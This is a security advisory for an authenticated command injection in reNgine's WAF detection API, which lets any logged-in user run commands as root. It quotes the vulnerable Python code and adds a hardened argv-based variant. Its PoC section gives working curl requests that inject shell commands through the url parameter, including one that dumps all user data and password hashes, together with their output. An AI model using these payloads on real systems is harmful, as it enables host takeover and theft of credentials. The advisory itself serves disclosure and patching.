Authenticated command injection in WAF detection tool

Critical
yogeshojha published GHSA-fx7f-f735-vgh4 Jul 23, 2024

Package

reNgine

Affected versions

>= 1.2.0

Patched versions

2.1.2

Description

Summary

An authenticated command injection vulnerability in the WAF detection tool allows an authenticated attacker to remotely execute arbitrary commands as the root user.

Details

The URL query parameter url is interpolated into a shell command string and passed to subprocess.check_output with shell=True without any sanitization, resulting in a command injection vulnerability.

rengine/web/api/views.py

Lines 268 to 275 in 53d9f50

url= req.query_params.get('url')
response = {}
response['status'] = False
wafw00f_command = f'wafw00f {url}'
output = subprocess.check_output(wafw00f_command, shell=True)
# use regex to get the waf
regex = "behind \\\\x1b\[1;96m(.*)\\\\x1b"

This API endpoint is accessible by authenticated users with any user role. Because the process runs as root, an attacker gains root access.
In order to capture the command output, an attacker needs to wrap the command to be executed in e.g. printf "behind \e[1;96m$(COMMAND HERE)\e[0m" so that the RegEx matches.

The vulnerable code was first released in reNgine 1.2.0 (May 29, 2022, 3d5f172).
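The following is an added example, not reNgine's code or its patch. It places the vulnerable shell-string construction from the snippet above beside a hardened variant that validates the url parameter and hands it to subprocess as an argument list (no shell), then parses wafw00f's output the way the endpoint does. It assumes wafw00f takes the target URL as a single positional argument, as in the page's own command.

```python
import re
import subprocess
from typing import Callable, Dict, List
from urllib.parse import urlparse

# The escape sequence is the one the advisory's regex matches. With text=True
# the real ESC character is matched, not the "\x1b" text str(bytes) produces.
WAF_LINE = re.compile(r"behind \x1b\[1;96m(.*?)\x1b")


def build_command_vulnerable(url: str) -> str:
    """Mirrors the advisory: the raw query value is spliced into one shell
    string, so ';' and $(...) in it are interpreted by /bin/sh."""
    return f"wafw00f {url}"


def validate_url(url: str) -> bool:
    """Allowlist: absolute http(s) URL with a host. This also rules out values
    starting with '-', which wafw00f could otherwise parse as an option."""
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and parsed.hostname is not None


def build_command_fixed(url: str) -> List[str]:
    """Hardened variant (assumption: wafw00f takes the URL as one positional
    argument). Returns argv so no shell ever sees the value."""
    if not validate_url(url):
        raise ValueError("url must be an absolute http(s) URL")
    return ["wafw00f", url]


def parse_wafw00f_output(stdout: str) -> Dict[str, object]:
    """Same response shape as the endpoint: the matched WAF name or raw output."""
    match = WAF_LINE.search(stdout)
    if match:
        return {"status": True, "results": match.group(1)}
    return {"status": False, "results": stdout}


def detect_waf(url: str, runner: Callable = subprocess.run) -> Dict[str, object]:
    """Run wafw00f with an argument list (no shell=True) and a timeout.
    `runner` is injectable so the logic can be exercised without wafw00f."""
    argv = build_command_fixed(url)
    completed = runner(argv, capture_output=True, text=True, timeout=120)
    return parse_wafw00f_output(completed.stdout)
```

Note that argv passing is the actual fix; the URL allowlist is defence in depth and on its own would not stop a crafted value from reaching a shell.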

PoC

  1. Set up reNgine as usual and create a user
  2. Log in as any user
  3. Run or open the following examples (adjust sessionid accordingly)
    1. Run python3 manage.py dumpdata to dump all Django data, including users and (hashed) passwords
    curl -k 'https://localhost/api/tools/waf_detector/?format=json&url=;printf%20%22behind%20%5Ce%5B1;96m$(python3%20manage.py%20dumpdata)%5Ce%5B0m%22' -H 'Cookie: sessionid=uioph56ozaauu6836h4h5mmliqcvp5xc'
    {"status":true,"results":"           _   _       _\\n          | \\\\ | |     (_)\\n  _ __ ___|  \\\\| | __ _ _ _ __   ___\\n | \\'__/ _ \\\\ . ` |/ _` | | \\'_ \\\\ / _ \\\\\\n | | |  __/ |\\\\  | (_| | | | | |  __/\\n |_|  \\\\___|_| \\\\_|\\\\__, |_|_| |_|\\\\___| v2.1.1\\n                  __/ |\\n                 |___/\\n\\n[{\"model\": \"auth.permission\"[...snip...]\"fields\": {\"password\": \"pbkdf2_sha256$260000$UPfSQ8dyrRcAcDKaCfvwcz$8x5ssagj5bmvSqtpgd6BMukSgmHNZepEf8uPS2Lalv0=\", \"last_login\": \"2024-07-22T23:10:06.233Z\", \"is_superuser\": true, \"username\": \"root\",[...snip...]

    2. Run echo "Hello from $(whoami)@$(hostname)" to print the current user and hostname
    curl -k 'https://localhost/api/tools/waf_detector/?format=json&url=;printf%20%22behind%20%5Ce%5B1;96m$(echo%20%22Hello%20from%20$(whoami)@$(hostname)%22)%5Ce%5B0m%22' -H 'Cookie: sessionid=uioph56ozaauu6836h4h5mmliqcvp5xc'
    {"status":true,"results":"Hello from root@e70b3c80d85a"}


Impact

This vulnerability allows any authenticated user, regardless of role, to execute arbitrary commands as root on the reNgine host.

Severity

Critical


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE ID

CVE-2023-50094
